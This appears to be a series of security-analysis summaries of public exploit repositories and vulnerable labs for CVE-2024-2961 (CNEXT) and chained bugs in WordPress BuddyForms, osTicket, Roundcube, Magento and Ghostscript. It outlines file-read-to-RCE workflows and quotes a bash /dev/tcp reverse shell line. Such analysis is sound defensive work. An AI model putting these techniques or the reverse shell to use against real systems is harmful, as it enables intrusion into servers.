CNEXT / glibc iconv() buffer overflow in ISO-2022-CN-EXT conversion

This repository is a vulnerable WordPress lab plus exploit material for two RCE chains: CVE-2024-2961 (glibc iconv/CNEXT PHP file-read to RCE) and CVE-2024-29510 (Ghostscript format-string to RCE). It is not just a standalone exploit; most of the repository builds a reproducible Docker environment that intentionally installs vulnerable components and exposes reachable web endpoints. Repository structure: the top level contains deployment/cleanup automation (setup.sh, clean.sh), two Docker Compose definitions for local and production-style labs, nginx configs, and a wordpress/ build context. The wordpress/ directory contains Dockerfiles that pin Ubuntu 22.04 with glibc 2.35, install WordPress, BuddyForms 2.7.6, PHP-FPM, and Ghostscript 10.02.1, plus entrypoint scripts that auto-configure the site. A custom mu-plugin adds an unauthenticated AJAX action convert_ps_to_image that accepts PS/EPS/PDF uploads, stores them under wp-content/uploads, and invokes ghostscript on them. Nginx is configured to expose uploads with autoindex enabled. Main exploit capabilities: the Python file exploit/cve=2024-2961.py is the primary exploit code. It adapts the public CNEXT technique to a WordPress AJAX endpoint by POSTing to /wp-admin/admin-ajax.php with action=upload_image_from_url. It uses a long php://filter iconv/base64 chain to turn a file-read primitive into disclosure of sensitive files such as /proc/self/maps and libc, then performs heap-oriented exploitation to execute an attacker-supplied command. This is a real exploit, not a detector. The included markdown exploit/cve-2024-29510.md is more of an operator note than code; it documents using a Metasploit Ghostscript module to generate a malicious PostScript file and then uploading it to the repository’s custom AJAX endpoint to obtain a reverse Meterpreter shell. Notable targeting details: the lab explicitly references WordPress, BuddyForms 2.7.6, glibc 2.35, and Ghostscript 10.02.1. The Docker setup intentionally enables risky conditions such as allow_url_fopen, PS/EPS/PDF processing, apparmor=unconfined, and extra Linux capabilities. Overall purpose: provide a realistic Ubuntu/WordPress environment for demonstrating how a web-exposed file-read primitive and a Ghostscript file-conversion feature can be chained into remote code execution.

This is a minimal proof-of-concept vulnerable PHP repository rather than a full exploit toolkit. The repository contains four files: a short README, a docker-compose file to launch a demo environment, a .gitignore, and a single PHP script. The core issue is in index.php, where attacker-controlled POST input from the 'file' parameter is passed directly into file_get_contents() and the returned data is echoed back. This creates a straightforward arbitrary file read / local file inclusion style vulnerability in a web context. Depending on PHP stream wrapper support and server configuration, an attacker may be able to read local files or other accessible resources by supplying crafted paths. The docker-compose.yml file builds a reproducible lab using the image vulhub/php:8.3.4-apache and exposes the application on host port 8080. There is no exploit automation, shell payload, persistence, or post-exploitation logic; the repository is essentially a deliberately vulnerable demo application suitable for reproducing and testing file-read behavior.

This repository is a minimal proof-of-concept vulnerable PHP web application rather than a full exploit toolkit. It contains four files: a README with a hint about a vulnerability/CVE, a docker-compose.yml file that launches a PHP 8.3.4 Apache container, and a single PHP script (index.php) implementing the vulnerable behavior. The core issue is in index.php: it reads a user-supplied POST parameter named 'file' and passes it directly to file_get_contents(), then echoes the returned data. This creates an arbitrary file read primitive over HTTP, allowing a remote user to request local files or other readable resources supported by PHP stream wrappers, depending on runtime configuration. The docker-compose file exposes the application on host port 8080 and mounts the vulnerable script into /var/www/html/index.php inside the container. There is no authentication, validation, sanitization, or path restriction. No explicit CVE identifier is present in the repository contents, so CVE attribution cannot be confirmed from the provided data alone. Overall, the repository appears intended as a simple demo/lab for a PHP file-read vulnerability reachable through a web interface.

This repository is a small, focused Python exploit project containing a README, one main exploit script, and a minimal requirements file. The core file, buddyforms_2.7.7_cnext_exploit.py, is a standalone exploit adapted from the CNEXT PHP file-read-to-RCE technique and tailored to BuddyForms 2.7.7 on WordPress. It is not part of a major exploitation framework. The exploit targets a vulnerable WordPress AJAX endpoint, typically /wp-admin/admin-ajax.php, using the BuddyForms action upload_image_from_url. The Remote helper class sends crafted POST requests with parameters action, url, id, and accepted_files. The url parameter is abused with a long php://filter chain containing multiple convert.iconv and base64 transformations. This is used first as a file-read primitive and then as the delivery mechanism for the final exploitation payload. Capabilities observed in the code include: arbitrary file retrieval from the target via php://filter/convert.base64-encode/resource=..., downloading sensitive process information such as /proc/self/maps, obtaining libc-related data for memory layout calculations, heap manipulation helpers for chunk shaping/compression/chunked encoding, and final remote code execution. The script constructs a reverse shell command automatically from attacker-supplied lhost and lport values: bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1". The repository structure is simple: README.md documents usage and references a blog post; requirements.txt lists ten and pwntools; the Python script contains the exploit logic, helper routines for encoding/compression/chunk construction, a Remote class for HTTP interaction, and an Exploit dataclass used as the main entry point. Based on the included reverse shell payload and end-to-end exploitation logic, this is an operational exploit rather than a mere detector or proof-of-concept.

Repository purpose: proof-of-concept tooling to assess and exploit osTicket CVE-2026-22200 (unauthenticated/guest reachable PDF-based local file read via PHP filters through mPDF), and optionally chain the file-read primitive into RCE using the CNEXT technique (CVE-2024-2961). Structure (10 files): - README.md: describes CVE-2026-22200 file read and chaining to CNEXT RCE; references Horizon3 blog. - check.py: unauthenticated vulnerability/exploitability checker. It probes osTicket endpoints (login.php, account.php, open.php, tickets.php) to infer patch status (notably via username format pre-validation returning “Invalid User Id” when patched) and whether guest workflows are enabled. - osticket_ticket_payload_gen.py: generates osTicket-specific HTML payloads that embed php://filter chains into CSS list-style-image URLs. Includes URL-encoding tricks (forced uppercase encoding, special separator) to bypass osTicket/htmLawed sanitization and mPDF quirks. Supports reading arbitrary files and optional base64/zlib transformations. - extract_pdf_images.py: post-exploitation helper to extract and decode exfiltrated file contents embedded in PDF bitmap images (best-effort base64 decode and raw zlib inflate). - cnext_exploit_payload_gen.py: offline generator for a CNEXT filter-chain payload. It consumes exfiltrated /proc/self/maps and a matching libc to compute addresses and prints a crafted php://filter path intended to achieve command execution when delivered through the file-read primitive. - try_download_libc.py: helper to recover full libc from libc.rip using a build-id extracted from a partial libc blob exfiltrated via the PDF channel; also attempts to print the libc version string. - osticket_access_bruteforce.py: auxiliary script to enumerate valid ticket-number/email combinations by requesting access links via login.php (CSRF-aware, threaded). - osticket_registered_user_enum.py: auxiliary user enumeration by attempting account registration via account.php and checking for “Email already registered”. - osticket_forge_access_link.py: auxiliary tool to craft a direct ticket view link (view.php?t=...&e=...&a=md5(...)) if the attacker knows/guesses the secret salt. - requirements.txt: dependencies (PyMuPDF, pillow, requests, pwntools, ten). Overall capabilities: end-to-end workflow for (1) checking patch/exploitability, (2) generating file-read payloads, (3) extracting exfiltrated data from PDFs, and (4) preparing a chained CNEXT payload for RCE given sufficient memory-layout/libc information.

This repository contains a Python exploit script (buddyforms_2.7.7_cnext_exploit.py) targeting the BuddyForms WordPress plugin version 2.7.7, leveraging CVE-2024-2961 and CVE-2023-26326 to achieve remote code execution (RCE). The exploit abuses a file read primitive in PHP, chaining multiple iconv filter conversions to ultimately execute arbitrary commands on the server. The main payload is a bash reverse shell, which connects back to the attacker's specified IP and port. The exploit interacts with the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) using crafted POST requests. The repository includes a README with usage instructions and a requirements.txt listing dependencies (pwntools, ten). The exploit is operational, providing a working RCE with a reverse shell, and is not just a proof of concept. No fake or destructive code is present. The main attack vector is network-based, requiring access to the vulnerable web endpoint.

This repository provides a working exploit for chaining two vulnerabilities: CVE-2023-26326 (WordPress BuddyForms Plugin insecure deserialization) and CVE-2024-2961 (glibc iconv RCE in PHP). The exploit is implemented in Python (exploit.py) and is designed to achieve remote code execution (RCE) on WordPress sites running the vulnerable BuddyForms plugin (version <2.7.8) on PHP 8.3.x. The exploit works by sending a specially crafted HTTP POST request to the /wp-admin/admin-ajax.php endpoint, abusing the 'upload_image_from_url' action to inject a PHP filter chain via the 'url' parameter. This allows the attacker to read arbitrary files and ultimately execute arbitrary commands, typically resulting in a reverse shell to the attacker's machine. The exploit script is operational and requires the attacker to provide the target URL and a shell command. The repository includes a README with detailed usage instructions, a requirements.txt for dependencies, and a .gitignore. The main entry point is exploit.py, which contains all the exploit logic, including file read and command execution primitives. The exploit is not part of a framework and is a standalone operational exploit.

This repository contains an operational exploit for CVE-2024-2961, targeting WordPress installations (or similar web applications) with a vulnerable 'upload_image_from_url' AJAX action. The exploit is implemented in Python (arbitrary-file-read.py) and allows an attacker to read arbitrary files from the target server by leveraging a filter chain generated by the wrapwrap tool. The attacker interacts with the script via a command-line interface, specifying the target URL, filter chain file, and content type. The script crafts HTTP POST requests to the /wp-admin/admin-ajax.php endpoint, using the filter chain to access files, and processes the server's response to extract and optionally download the file contents. The README provides usage instructions and an example workflow. The exploit is not part of a larger framework and is a standalone operational tool.

This repository contains a Python proof-of-concept exploit for CVE-2024-2961, a vulnerability in PHP's iconv library that allows arbitrary file read via crafted encoding filter chains. The repository consists of two files: a README.md with detailed usage instructions and background, and lfi.py, the main exploit script. The script constructs a complex PHP filter chain payload, uploads it to a vulnerable server via a POST request to the admin-ajax.php endpoint (mimicking an image upload), and then retrieves the resulting file from the server's uploads directory. The exploit is interactive, prompting the user for the file path to read and an upload ID, and then displays the contents of the target file if successful. The exploit targets web servers running PHP with a vulnerable iconv version and requires the ability to upload files via a web endpoint. The main endpoints hardcoded in the script are for a sample target (blog.bigbang.htb), but these can be adapted for other vulnerable servers. The exploit is a POC and does not provide weaponized or post-exploitation capabilities beyond file read.

This repository contains a Python exploit (exp.py) and a minimal PHP script (test.php) for CVE-2024-2961, a vulnerability in PHP. The PHP script acts as a vulnerable endpoint, echoing the contents of any file specified via the 'file' parameter. The Python exploit leverages this to read /proc/self/maps and other files, enumerate memory regions, and craft a complex payload that abuses PHP's filter chain to achieve remote code execution. The exploit ultimately executes a reverse shell command (using netcat) to connect back to the attacker's machine. The exploit demonstrates advanced heap manipulation and filter abuse, requiring the attacker to control the 'file' parameter and have the ability to send HTTP requests to the vulnerable PHP endpoint. The repository is operational, providing a working exploit and a demonstration payload.

This repository contains multiple operational exploits for CVE-2024-2961 (CNEXT), a buffer overflow in glibc's iconv() function, and a combined exploit for CVE-2024-34102 (CosmicSting) affecting Magento. The main exploit scripts are: - cnext-exploit.py: Achieves RCE via a PHP file read primitive, exploiting iconv() in glibc. The attacker must be able to control a file path read by PHP (e.g., via file_get_contents). The exploit leaks memory, locates libc and PHP ELF, and hijacks control flow to execute arbitrary commands. - blind-cnext-exploit.py: A more advanced, 'blind' variant that works even when output is not directly visible, by detecting PHP OOM errors as an oracle. Requires the attacker to adapt the Remote class to the target's HTTP interface. - roundcube-exploit.py: Authenticated RCE exploit for Roundcube webmail, leveraging the same glibc iconv() bug. Requires valid credentials and targets the mail compose endpoint. - cosmicsting-cnext-exploit.py: Combines the CNEXT bug with CosmicSting (CVE-2024-34102) to achieve RCE on Magento <= 2.4.7 via a crafted REST API request and XXE payloads, using a local HTTP server for exfiltration. - pocs/poc.c and pocs/poc.php: Proof-of-concept code for triggering the iconv() bug in C and PHP, respectively. The repository is well-structured, with each exploit script targeting a specific scenario or application. The exploits require a vulnerable glibc (unpatched iconv), and in some cases, specific application versions (Roundcube, Magento). The main attack vector is network-based, targeting web applications that use PHP and allow user-controlled file reads. The payloads result in arbitrary command execution on the target system.